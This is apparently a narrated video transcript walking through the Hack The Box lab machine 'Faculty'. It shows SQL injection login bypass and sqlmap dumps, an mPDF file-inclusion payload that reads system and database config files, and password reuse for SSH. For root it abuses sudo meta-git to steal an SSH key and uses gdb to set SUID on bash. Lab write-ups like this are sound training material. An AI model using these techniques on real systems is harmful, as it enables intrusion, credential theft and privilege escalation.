Hey guys, welcome back. Hope you all are doing well. Today we are going to solve a machine from Hackthebox. The machine name is Faculty and the difficulty level of this machine is medium. So without wasting time, let's go and we will start that machine. But before that, if you did not subscribe the channel, please subscribe the channel and hit the bell icon so that you can get the notifications on time. So that's been said. Nmap space hyphen s capital V for version enumeration space hyphen s capital C for default scripts, and the target IP is 10.10.11.169. I want to save this scan result in a file named as default.nmap. To save the time, I already ran the scan, so I'm gonna just show you the scan result. There are two ports open, port number 22 TCP port, the port state is open, service is SSH, and the version of it is OpenSSH 8.2 P1. The second port is port number 80. Again, this port is open. This port is default for HTTP and it's NGINX 1.18.0, and the operating system seems to be Ubuntu. So that's been said, let's go. First of all, I'm going to tell you that I already created a record in etc host file with this name, so that's why I can access this web application with the name faculty.htb, and here it's asking for faculty ID number. So we will come on it in a minute, but before that it's always better to run some process in the backend. So I'm going to make directory enumeration with the GoBuster. So GoBuster directory enumeration, don't want to see the progress, W for the word list, so user share word list, sec list, discovery, web contents, and there is a file named as draft medium directories lowercase dot text space hyphen u for the URL http:// faculty.htb, and number of threads I'm going to choose here 40 and just hit enter. Go back to the web application and here let's try something 112233 and just hit the login button, but the ID number is incorrect. So let's go and we will capture this request with the burp proxy. So enable the burp proxy on your browser. I already open up the burp proxy here. So go to the proxy, intercept is off, HTTP history, and okay, so login and we get here the request. This is a post request, and as you can see, ID number is equal to this, but in the response we have number 3. So because we have nothing to do here much, we can just actually try injection because the rest of the things doesn't seem much interesting. So I just try here a single quote. So let's see if we get some error or not, because once we add single quote, that makes the SQL query syntax incorrect. So that should generate some error, but we did not get any error in this page. Instead, just ID number is incorrect. But if we send this request to the repeater, go to the repeater, and here if we try single quote, we get here error. And actually this is a message or a notice that trying to get property num underscore rows, means number of rows of non-object, in var www scheduling, and this is admin underscore class dot php. This is the absolute path, and it's saying actually that in this admin underscore class dot php there is no object for what you are trying to get the property num underscore rows. So that means there is some kind of error, and it is customized the application. In the application the error customization is there, so we get, instead of error, we get this notice. We can try maybe this, so to create a structure, and still we did not get. So instead of space I put plus and one more dash, send again, and this time we did not get any notice. Instead we just get response 3. So that means the ID number is incorrect, but actually we built the structure where we can put the SQL syntax or conditions, whatever we want. So we know that this ID number is incorrect, so we can try space or space 1 equal to 1. That means one of this value must be correct, right, in case of OR operator. So we know that this is incorrect, but 1 is equal to 1 condition is always correct, so it should log in now, and as expected it's logged in, and as you can see the response is different. Now it's 1, before it was 3. So let's try the same thing here. So single quote space or space 1 equals to 1 dash dash space dash, and hit the login button, and we are logged in. So that's great. Now go back to the directory enumeration process, and here we have 2 directories only. I'm going to copy this, come here, 2 ports open, 22 comma port number 80, and in the directory enumeration we found 2 directories. Actually the admin directory we already see here, right, but we have one new directory which is mpdf. So what is that mpdf? We will see that in a minute. Let's go, and here if we see, there is not much, but we have school faculty scheduling system, right. I want to show you one very interesting part here. If I take this index.php, instead of index.php, if I just say admin, so it is going to show us this portal, but this portal is for this faculty member, which is John Smith. We have course list here, we have subject, faculty, schedule, all of these, right. If I log out from here, okay, and it is going to give us this page, which is admin page. So if I do not put here anything, just index.php, login.php, it is going to give us this page, which is to put here or to log in here as a faculty. But instead of that, if without login as any faculty member, if I just say admin, it is going to redirect us to a page where we have to log in as user with the username and password credential. So one more thing we can do, because we know that SQL injection is there, SQL injection vulnerability is there. So let's try to see with the SQL map. So I'm going to copy this URL, put that here, space hyphen data is equal to ID underscore number. This is actually the parameter, and any value you can put here, space hyphen p, which parameter you want to test. So we want to test ID underscore number parameter, space hyphen dbms. So the database, backend database seems like MySQL, and let's try to see the database name, and hyphen batch SQL map, space hyphen help, hit enter. I think current database, cu current db, I think. It's very hard to remember everything always. So current db, yeah, current db, this one. So I want to know the current database now, hit enter, and it's saying the current database is scheduled database. scheduling underscore db. I'm going to copy this and keep it with me. Paste that. Now I want to dump this database, so clear. Now we know the database name -d, which is going to be scheduling underscore db. Copy that and paste that here. Now I want to see the tables. Okay, hit enter. And these are the tables. So there are 6 tables. Copy that, come here, paste that, save it. So now among these tables, I'm interested in faculty and the users. So let's go, first of all, we will try table faculty. Actually I forgot here to make it -dump to dump this table. Okay, so the table is dumped. Now this is the table for faculty. So copy that, paste that. Okay, now let's try to have users table. Everything is same, just change the name of table. And this is the users table. Okay, copy and paste that here. Now we have faculty table and we have user table. There is some broken output we have here. As you can see, this hash is broken. Okay, and this, it should be NAME name, but this is broken. So you can query, or you can retrieve that data manually by just putting the column number. I can show you just real quick. So table name is this, space -c for the column, and let's say column name, and hit enter. So, and name is going to be administrator, and as you can see here, it's blank. So this is administrator. So now we know that there is username admin, and there is a hashed password, and the name of the user is administrator. Although once you do this, maybe you get the full hash of this, but once I did that, I get the full hash, but it is not crackable, or maybe I do not have the exact match in my word list. So I couldn't crack it, but I found a way, because the application is vulnerable to SQL injection, and we already bypassed the faculty. I just want to show you once about this. So we already have the faculty members, so just copy any of these and paste it here, click login, and we are logged in as now Charlie Black. Right now let's log out, and I'm going to make it go to admin. Also I want to open one more private window, http:// okay, so here I'm going to log in with a faculty member, and in this I'm going to bypass the admin login, because I know now that there is admin user. So admin and space 1 equal to 1, like this, and anything, password is anything, because now password is actually not a big deal, doesn't matter, because this part will comment rest of the query. So it is going to say select something from users where username is equal to something and password is equal to something. But now once you put the username value like this, it is going to comment rest of the query after this. So password will not take effect. Just send this and we should logged in. Yeah, we logged in, and as you can see here, welcome back administrator. But once we come here as a faculty member and we put here admin, so we are going to the portal, but I will show you the difference between the admin portal and normal faculty member portal. So this is the faculty member portal. You can see welcome back Black Charlie. So here you can see 1 2 3 4 5 options are there. But if I come to the administrator portal, here 1 2 3 4 5 6, and here you can also manage the users. But in the faculty member portal, there is no option for the users. This is the only difference, right? Now the next process, whether you carry on with this faculty member or you carry on with administrator, it's same. So let's go and we will start with the with this administrator. It's better, but you can do in this way also. That's what I wanted to say. So close this one and we will start with the administrator. So now I go to the course list and I also turn on the burp proxy here. So if I click on PDF, it's going to generate the PDF, and here it's showing us the PDF. So what it's actually doing, it's taking this HTML contents and it's converting it into the PDF. And as you can see here in the URL, you will find mpdf/temp, and this is the name of the PDF file. Now go to the burp proxy and see this request. Okay, so this is the request. This is the request. So as you can see, this request contains PDF is equal to, and all these seems like base 64. So if you see the inspector, just choose this base 64 value. If you see the inspector, you will find here this is your value, and it decoded it with the base 64. So once this one is decoded as base 64, you get this value. And here, as you can see, there is name, there is faculty.htb, there is courses, and it's very smart, and it's kind of decoded with the URL decode. So once it decoded, it comes like this, and it decoded it again, and here you can see it in a clear text format. And this clear text format is actually HTML. So this is the header one, which is name, and this is faculty.htb. So that is something which we need to see. This is interesting. Okay, second thing, we have something here, mpdf. So let's try to search in the search exploit mpdf, hit enter. There is mpdf 5.3, this is file disclosure, and 7.0 file inclusion, local file inclusion, LFI. So let's try this one. Search exploit space -m, and this is the value. Okay, just copy this, paste it here, hit enter. It is going to save this file here. So now let's open this file and we will see what's inside. First of all, we actually do not know what version of mpdf is used by the application, but this exploit for mpdf 7.0. So as you can see, it's importing base 64, and here it's generating the payload. So local file inclusion vulnerability is there, means we can read the system files. We just need to mention here file name, content is equal to file name, and here file attach is equal to file name. So what it exactly going to do is it is going to make an attachment once it's generating this PDF. With generating PDF, it is going to make one attachment, and in the attachment it is going to call the content of the file which you put here, which you want to read, and then it is going to make it encode base 64 encode, right? So but here, as you can see, it is just going to encode it, I think, one time URL encode and one time base 64 encode. But what we have here in our case, there are two URL encode and one base 64 encode. So 2 times it's URL encoding and 1 time it's base 64 encoding. Fine. So we need to see MPDF. What is MPDF? It's a library, or it's some kind of application or API. What is it? This is the manual. Okay, here it's already written. MPDF is a PHP library which generates PDF files from UTF-8 encoded HTML. So it is based on FPDF and HTML to FPDF. So that's correct, because here, as you can see, the content is HTML. So it's converting the HTML content into the PHP, into the PDF format. Okay, what we need to do here is this time, first of all, we need to create a payload. So I'm going to take this value and put it here, and let's try here /etc/passwd and just paste that content everywhere. Copy, paste that here and paste that here. Okay, save it. Turn off burp proxy here, and I'm going to cyberchef. Okay, now to reverse the process to encode, if we see this one, so we are actually decoding. So for the successful exploit, we need to encode it. So 2 times URL encode and 1 time at last base 64 encode. So URL encode 2 times and 1 time base 64 encode. So 2 base 64, right? Now copy this, come here and paste that. So this is the final payload for us. Just copy this, come back to the browser, start the burp proxy on your browser. In the intercept section, make intercept on, and let's try to download PDF one more time. So as you can see here, we get this content. Just delete that and paste your content, what you actually generated with the cyberchef, this one, and forward it. Forward one more time. Okay, what is that? And this is coming from push service from Mozilla Firefox. We don't need that. Intercept is off. Come back here, and as you can see, this time the PDF is generated, but we have nothing here because we actually did not give anything, right? So but here, if you see this button for the indexing, click on it and there is one attachment. So click on attachment icon and there is password file, desktop, HTB, faculty, and save that. Go to the faculty, there is password file. It's open here and we have that. So local file inclusion we exploited successfully. Now you can see here there is few genuine users like developer, GB YOLO, www data, and root. So I'm going to copy, write it here. So GB YOLO, developer, we also have root, right? Okay, But the thing is, we can read files, so we can read maybe the ID RSA private keys for these users, or we can also read the application files, PHP files. And the concept here is my mindset, like, because this application is linked with MySQL server, database server, so that must have a database connection file which contains the database credentials. So many times administrator use the same password in many places. So let's go, and first of all we need to write what we know. So we know index.php, we know login.php, we know ajax.php, we see ajax.php in the beginning, here ajax.php. Okay, so let's try to read this, and I will start with the index.php. So for index.php, to read index.php, go to CyberChef, and instead of that, let's say index.php, copy, paste, big, it's already done. Copy that, again the same process, but proxy is enabled, just make the intercept on, and PDF, take this out, paste that, and forward, and it's here. So now again go to this indexing section, and here you have attachment, and in the attachment you have index.php. Save that file and go back to the faculty, open index.php, come here, and this is your index.php. So in index.php there is login.php, right? And there are other files like header.php, auth.php. This auth.php could also be very interesting, because this is maybe authentication.php or authorization.php, although it is commented here in the source code, but maybe it is still exists in the directory. Okay, so first of all I'm going to now see login.php. Okay, so the process is same. Go here, login.php, and login.php. Fine, take this, come here, intercept is on, PDF, download this again, and instead of this just put that, and forward this request, forward again, make intercept off, come back here, and again you have here login.php. So save this file also, come back here, now this time open login.php, and in login.php you can see this is the database connection file. So now we have one more file which we can write here, and this time I'm going to read this. Okay, I don't need that, I don't need that, I don't need that, also this one. Okay, go back to the CyberChef again, db_connect, this is the file name, right? db_connect, yeah. Copy, paste, and paste. Okay, copy this, come here again, make sure intercept is on, come here, and paste it here, forward, intercept off, come back here. Oh, not found, why so? Okay, let's try one more time. Intercept is on or not, make sure intercept is on. No, I don't need that. PDF, and yeah, paste that, forward, and yeah, this time we have it here. Okay, intercept is off. Come back here, come here, go to the attachments, db.php, save this file, come here and just open this file, and we have the database connection string here. And as you can see, the username password is in the clear text format. So this is the database user, this is the password for the database user, and this is the database name. So I'm going to take this password with me, copy that, come here. Okay, so username we don't know, but the password is this, right? Now if the password reuse is there, so we can go for clear SSH. Let's try first, where is the user, GB YOLO. Let's try with this, GB YOLO at faculty.htb. hit enter, let's say yes, and paste the password, and we logged in. That's perfect. Clear ls space -la. What we have here, nothing much, but .ssh is there, ls space -la .ssh, and there is no IDRSA key. Net state space -tlpn. This is for MySQL. It is locally published. So with these credentials, we can log into MySQL and we can enumerate the database, but there is not much. We already dumped the database before. So the next step is, let's see, sudo space -l. Hit enter, paste the password again, and yeah, we have it. So we can actually run this metagit binary with the sudo as developer user, because we saw before there is one user named as developer, this one, in the etc passwd file. So okay, I'm going to take this, copy, come here, paste that, save it. Now let's go to the Google and we are going to search about it. Okay, I don't want web proxy now. Come here, meta-git sudo metagit exploit remote code execution. Let's go there. Metagit, and there is a reference from the HackerOne. Okay, so this is the reference here. First of all, let's copy this, copy. I'm going to clear this, ls space -la, paste that. Okay, let's try to run this once, space -u developer, because we can run it as developer. Paste that. So there are some switches like add, branch, checkout, clean, clone, commit, all these. Okay, go back to the report from HackerOne. So as you can see here, we can actually execute following command in another terminal, and this is how we can execute, we can exploit the remote code execution vulnerability. So with the clone switch, what we saw here, this clone switch, what it does, clone meta and child repositories into new directory. So because we can run metagit as developer user, so once we use this clone switch, and whatever we write into another directory, we will write it as developer user. This is the concept, and you can execute the command like this. So I'm going to come here, clear sudo okay, with the clone switch, and then copy that, paste it here, hit enter. So this should create the hacked file, because we are executing touch hacked. So that command will create a file named as hacked. So ls space -la, it's not here. Clear cd/temp. Oh, come on, cd/temp. Now from here, let's execute that command one more time. Okay, ls space -la, and as you can see, hacked file is created here, but the owner is developer, and we can write this file. We can read this file. Fine. Similarly, if we can do this, we can actually execute any command, because it's remote code execution. So let's try to copy /home/developer/ .ssh/idrsa. If the idrsa private key is there, so it should be copied in the temp directory. So I'm saying copy this file here, hit enter, ls space -la, and idrsa key is there, but we cannot read, we cannot write, we cannot do anything with this file, because developer is the owner of this file. But we can exploit this metagit as remote code execution, so we can do anything, because here whatever we are executing command, we are executing as developer. So I can say change mode 755 for idrsa, hit enter, ls space -la, and this time you can see that we have now read permission. So let's get idrsa, and this is the idrsa key. So just copy this key, come back here, clear nano id_rsa, and just paste that here. Control O, enter, Control X. chmod plus 600, chmod 600 id_rsa. Now let's try to log in. ssh space -i id_rsa, developer at faculty.htv. And we logged in. So ls space -la, we have user flag here. So cat user.text, this is our user flag. Okay, that's fantastic. Now let's try few basic commands for enumeration. So if you write here id command, you can see developer user is a member of two other groups. First is debug and second one is faculty. So now let's try what this debug group can execute or run or write, whatever. So find /-group, and the group name is debug. Let's say 2/dev/null, hit enter. And this group, any member of this group can execute this binary. Okay, so let's try what permissions are there. Okay, so only root and users from this debug group can execute this. /user bin gdb, hit enter. GDB is there. help. Okay. Fine, but there should be something which we need to add with this GDB to debug, right? I'm gonna say exit. What is it? Quit. Yeah. Clear. Now come back here. Clear. Exit that. Now we don't need that. Clear. SSH space -I IDRSA. Developer at faculty.htb. cd/opt ls space -la linpiece. Do we have it here? Yeah, linpiece is there. We have pspy64 there or not? Yeah, it's also there. So I wanna upload these two directories on the target. So python 3 space -m http dot server on port number 80. Now come here, cd. We are inside. Go to the temp directory. wget http :// this is my IP, pspy64. Let's also try to download linpiece.sh. Okay, both of these there. chmod plus x linpiece and chmod plus x pspy. Clear. Okay, now here I'm going to run pspy, and here I'm going to run linpiece. Let's see what we have here. cd/temp ls. Yeah, linpiece is there. So linpiece.sh, and here I'm going to execute pspy to see the real-time processes, and I'm going to pause the video. Once it's finished, this and this, I will come back. Welcome back, guys. So linpiece is done, and if we go, let's see what we have here. So here actually I found some process here and here also in pspy. So from the beginning, if you see all these process, php fpm and all, this one for nginx, okay, root service underscore check dot sh, go down, and there is one network d dispatcher. So user bin python 3 and user bin network d dispatcher, and it's run startup triggers. So if you go to search about this network dispatcher vulnerabilities, you will find few. Okay, so there are some vulnerabilities discovered in Linux network D dispatcher, and this is CVE 2022 29,800, 29,799. So I'm interested in that because you can see the vulnerability is in the binary, and these vulnerabilities collectively referred to as Nimbus pawn. The two vulnerabilities consist of directory traversal and time of check time of use risk condition. Okay, but we have here GDB. So what we can do with these two, come back here. First of all, we have /user/bin/gdb, and the second we have this one. Copy that, come here, paste it. So, and this is the process ID. So what we can do, we can actually add this process with the process ID using GDB inside the GDB, and this is the debugger. And because this process is running as root, so we will see what we can do. Come back here, clear this, or we can come here. Okay, so /user bin GDB. If there is a process running and you want to connect that process with the GDB to analyze, so you can specify --p, and the process ID is 725, so just 725 and hit enter. So now you can see the process is attached with it. C to continue. Okay, and we have now GDB here. Fine. So what we can do here, if we say help, but we can try something because the process is already running, so we can use call method, and we can write it like void, and I'm gonna call system, and let's say, come on, whatever command here you want to execute. So let's see, chmod u+s /bin/bash. So I'm going to try to set the SUID bit on bash binary. Okay, let's hit enter, and before going to hit enter, I'm gonna say ls -la /bin/bash. So as you can see, there is no SUID bit set, right? But after executing that, okay, it's executed. Now if I again try that, so you can see the difference here. Instead of execute, this SUID bit set, instead of X there is S, so SUID bit is set. Okay, so that means if I say /bin/bash -p, hit enter, and now if we are root, who am I? We are root. So cd/root ls -la, and there is root.txt. So if I say cat root.txt, so this is the root flag. So that's it for this video. Hope you like the content. If you like the content, please like, subscribe and share. See you in the next video. Bye.